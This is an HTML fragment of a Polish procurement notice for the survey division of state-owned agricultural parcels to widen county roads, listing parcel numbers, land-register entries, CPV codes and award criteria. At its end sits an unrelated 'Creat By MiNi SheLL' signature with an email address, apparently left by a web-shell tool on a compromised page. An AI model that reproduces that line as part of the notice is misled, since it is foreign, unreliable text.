<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.  Określenie przedmiotu zamówienia:
Zadanie polega na: wykonaniu podziału niżej wymienionych nieruchomości stanowiących własność Agencji Nieruchomości Rolnych tj.:
1) Nieruchomości położonej w obrębie ewidencyjnym 0015 Zarębice, gmina Przyrów, oznaczonej w rejestrze ewidencji gruntów i budynków jako działka nr 64, karta mapy 7, polegający na wydzieleniu części w/w działki przewidzianej w miejscowym planie zagospodarowania przestrzennego gminy Przyrów pod poszerzenie drogi powiatowej nr 1096 S relacji Przyrów - Podlesie - Drochlin; dla przedmiotowej nieruchomości Sąd Rejonowy w Myszkowie Wydział Ksiąg Wieczystych prowadzi księgę wieczystą CZ1M/00093730/6;

2) Nieruchomości położonej w obrębie ewidencyjnym 0001 Biskupice, gmina Olsztyn, oznaczonej w rejestrze ewidencji gruntów i budynków jako działka nr 178/3, karta mapy 4, polegający na wydzieleniu części w/w działki przewidzianej w miejscowym planie zagospodarowania przestrzennego gminy Olsztyn pod poszerzenie drogi powiatowej nr 1012 S relacji Zrębice - Biskupice - Choroń;

3) Nieruchomości położonej w obrębie ewidencyjnym 0023 Zaróg, gmina Koniecpol, oznaczonej w rejestrze ewidencji gruntów i budynków jako działka nr 872, karta mapy 2, polegający na wydzieleniu części w/w działki przewidzianej w miejscowym planie zagospodarowania przestrzennego gminy Koniecpol pod poszerzenie drogi powiatowej nr 1092 S relacji Kuźnica Grodziska - Żelisławice - Bugaj; dla przedmiotowej nieruchomości Sąd Rejonowy w Myszkowie Wydział Ksiąg Wieczystych prowadzi księgę wieczystą CZ1M/000037505/0;

4) Nieruchomości położonej w obrębie ewidencyjnym 0010 Widzów, gmina Kruszyna, oznaczonej w rejestrze ewidencji gruntów i budynków jako działki: nr 1135, nr 1137, nr 1138, nr 1242 i nr 1244, karta mapy 1, polegający na wydzieleniu części w/w działek przewidzianych w miejscowym planie zagospodarowania przestrzennego gminy Kruszyna pod poszerzenie drogi powiatowej nr 1006 S relacji Wikłów - Lgota Mała - Antoniów - do DP 1025 S; dla przedmiotowych działek Sąd Rejonowy w Częstochowie Wydział Ksiąg Wieczystych prowadzi księgi wieczyste: CZ1C/00167605/1, CZ1C/00105766/5, CZ1C/00157506/4. 

Podział nieruchomości następuje w trybie przepisu art. 98 ust. 1 i ust. 2 ustawy 
z dnia 21 sierpnia 1997 r. o gospodarce nieruchomościami (Dz. U. z 2015 r., poz. 782) 
w związku z art. 93 ust. 1 i art. 97 ust. 1 tej ustawy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.35.50.00-1, 71.22.22.00-2, 71.35.41.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 14.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 98</li>
<li>2. Termin wykonania zamówienia - 2</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com